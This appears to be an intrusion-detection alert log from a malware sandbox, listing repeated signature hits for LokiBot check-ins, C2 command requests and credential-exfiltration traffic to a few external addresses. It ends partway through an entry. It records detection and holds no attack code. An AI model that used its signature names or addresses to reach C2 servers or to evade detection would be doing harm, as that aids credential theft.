ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749832802021641 06/09/22-12:20:23.981118
SID:	2021641
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749802802021641 06/09/22-12:20:04.084401
SID:	2021641
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749774802025381 06/09/22-12:19:21.474099
SID:	2025381
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649771802825766 06/09/22-12:19:17.236324
SID:	2825766
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749748802024312 06/09/22-12:18:50.155870
SID:	2024312
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749832802025381 06/09/22-12:20:23.981118
SID:	2025381
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649751802024313 06/09/22-12:18:53.097950
SID:	2024313
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649768802825766 06/09/22-12:19:10.383861
SID:	2825766
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749752802025381 06/09/22-12:18:54.883061
SID:	2025381
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649776802025381 06/09/22-12:19:23.957128
SID:	2025381
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749777802825766 06/09/22-12:19:25.204896
SID:	2825766
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749785802024313 06/09/22-12:19:42.634597
SID:	2024313
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749770802024313 06/09/22-12:19:14.041674
SID:	2024313
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749773802021641 06/09/22-12:19:20.082461
SID:	2021641
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749786802825766 06/09/22-12:19:44.361044
SID:	2825766
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.7

Timestamp:	192.168.2.3188.114.97.749765802825766 06/09/22-12:19:04.748877
SID:	2825766
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749767802024313 06/09/22-12:19:08.800960
SID:	2024313
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749752802825766 06/09/22-12:18:54.883061
SID:	2825766
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649768802021641 06/09/22-12:19:10.383861
SID:	2021641
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749800802021641 06/09/22-12:20:00.829408
SID:	2021641
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749800802825766 06/09/22-12:20:00.829408
SID:	2825766
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.7

Timestamp:	192.168.2.3188.114.97.749765802021641 06/09/22-12:19:04.748877
SID:	2021641
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749794802025381 06/09/22-12:19:52.723950
SID:	2025381
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749745802021641 06/09/22-12:18:46.752225
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749786802024313 06/09/22-12:19:44.361044
SID:	2024313
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749774802021641 06/09/22-12:19:21.474099
SID:	2021641
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749777802021641 06/09/22-12:19:25.204896
SID:	2021641
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749819802825766 06/09/22-12:20:19.468606
SID:	2825766
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749769802025381 06/09/22-12:19:11.569140
SID:	2025381
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749805802024313 06/09/22-12:20:10.598374
SID:	2024313
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749784802025381 06/09/22-12:19:39.004620
SID:	2025381
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649771802021641 06/09/22-12:19:17.236324
SID:	2021641
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649778802825766 06/09/22-12:19:26.733758
SID:	2825766
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749799802021641 06/09/22-12:19:59.356295
SID:	2021641
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649824802025381 06/09/22-12:20:22.688767
SID:	2025381
Source Port:	49824
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649775802825766 06/09/22-12:19:22.604146
SID:	2825766
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749803802825766 06/09/22-12:20:05.555366
SID:	2825766
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749810802025381 06/09/22-12:20:16.253890
SID:	2025381
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749796802021641 06/09/22-12:19:54.857506
SID:	2021641
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749761802021641 06/09/22-12:18:59.590864
SID:	2021641
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749804802025381 06/09/22-12:20:07.542975
SID:	2025381
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749844802021641 06/09/22-12:20:27.377021
SID:	2021641
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749844802825766 06/09/22-12:20:27.377021
SID:	2825766
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749851802025381 06/09/22-12:20:29.327641
SID:	2025381
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749819802021641 06/09/22-12:20:19.468606
SID:	2021641
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749797802025381 06/09/22-12:19:56.597737
SID:	2025381
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749761802825766 06/09/22-12:18:59.590864
SID:	2825766
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749796802825766 06/09/22-12:19:54.857506
SID:	2825766
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649778802021641 06/09/22-12:19:26.733758
SID:	2021641
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749783802021641 06/09/22-12:19:36.273915
SID:	2021641
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749839802025381 06/09/22-12:20:25.206676
SID:	2025381
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749802802024313 06/09/22-12:20:04.084401
SID:	2024313
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749798802025381 06/09/22-12:19:58.002191
SID:	2025381
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749748802021641 06/09/22-12:18:50.155870
SID:	2021641
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649778802024313 06/09/22-12:19:26.733758
SID:	2024313
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749797802024313 06/09/22-12:19:56.597737
SID:	2024313
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749794802021641 06/09/22-12:19:52.723950
SID:	2021641
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749769802024313 06/09/22-12:19:11.569140
SID:	2024313
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749782802024313 06/09/22-12:19:30.781711
SID:	2024313
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749783802825766 06/09/22-12:19:36.273915
SID:	2825766
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749803802021641 06/09/22-12:20:05.555366
SID:	2021641
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649764802025381 06/09/22-12:19:02.212367
SID:	2025381
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749817802025381 06/09/22-12:20:18.206399
SID:	2025381
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649801802025381 06/09/22-12:20:02.469935
SID:	2025381
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749802802825766 06/09/22-12:20:04.084401
SID:	2825766
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749798802825766 06/09/22-12:19:58.002191
SID:	2825766
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749779802024313 06/09/22-12:19:28.006927
SID:	2024313
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749839802024313 06/09/22-12:20:25.206676
SID:	2024313
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649768802024313 06/09/22-12:19:10.383861
SID:	2024313
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749817802825766 06/09/22-12:20:18.206399
SID:	2825766
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649764802825766 06/09/22-12:19:02.212367
SID:	2825766
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749802802025381 06/09/22-12:20:04.084401
SID:	2025381
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749793802825766 06/09/22-12:19:50.509118
SID:	2825766
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.7

Timestamp:	192.168.2.3188.114.97.749765802024313 06/09/22-12:19:04.748877
SID:	2024313
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749786802021641 06/09/22-12:19:44.361044
SID:	2021641
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649801802825766 06/09/22-12:20:02.469935
SID:	2825766
Source Port:	49801
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749783802025381 06/09/22-12:19:36.273915
SID:	2025381
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749807802025381 06/09/22-12:20:13.436189
SID:	2025381
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649775802021641 06/09/22-12:19:22.604146
SID:	2021641
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749777802024313 06/09/22-12:19:25.204896
SID:	2024313
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749800802025381 06/09/22-12:20:00.829408
SID:	2025381
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749805802021641 06/09/22-12:20:10.598374
SID:	2021641
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749810802825766 06/09/22-12:20:16.253890
SID:	2825766
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649820802021641 06/09/22-12:20:20.867617
SID:	2021641
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749774802024313 06/09/22-12:19:21.474099
SID:	2024313
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749770802825766 06/09/22-12:19:14.041674
SID:	2825766
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749807802825766 06/09/22-12:20:13.436189
SID:	2825766
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749804802825766 06/09/22-12:20:07.542975
SID:	2825766
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749745802825766 06/09/22-12:18:46.752225
SID:	2825766
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649771802024313 06/09/22-12:19:17.236324
SID:	2024313
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749851802021641 06/09/22-12:20:29.327641
SID:	2021641
Source Port:	49851
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749844802024313 06/09/22-12:20:27.377021
SID:	2024313
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749793802025381 06/09/22-12:19:50.509118
SID:	2025381
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749796802025381 06/09/22-12:19:54.857506
SID:	2025381
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749799802024313 06/09/22-12:19:59.356295
SID:	2024313
Source Port:	49799
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749832802825766 06/09/22-12:20:23.981118
SID:	2825766
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749784802021641 06/09/22-12:19:39.004620
SID:	2021641
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749785802025381 06/09/22-12:19:42.634597
SID:	2025381
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749805802025381 06/09/22-12:20:10.598374
SID:	2025381
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

Timestamp:	192.168.2.3188.114.96.749766802024313 06/09/22-12:19:06.967493
SID:	2024313
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.6

Timestamp:	192.168.2.3188.114.97.649751802025381 06/09/22-12:18:53.097950
SID:	2025381
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.7

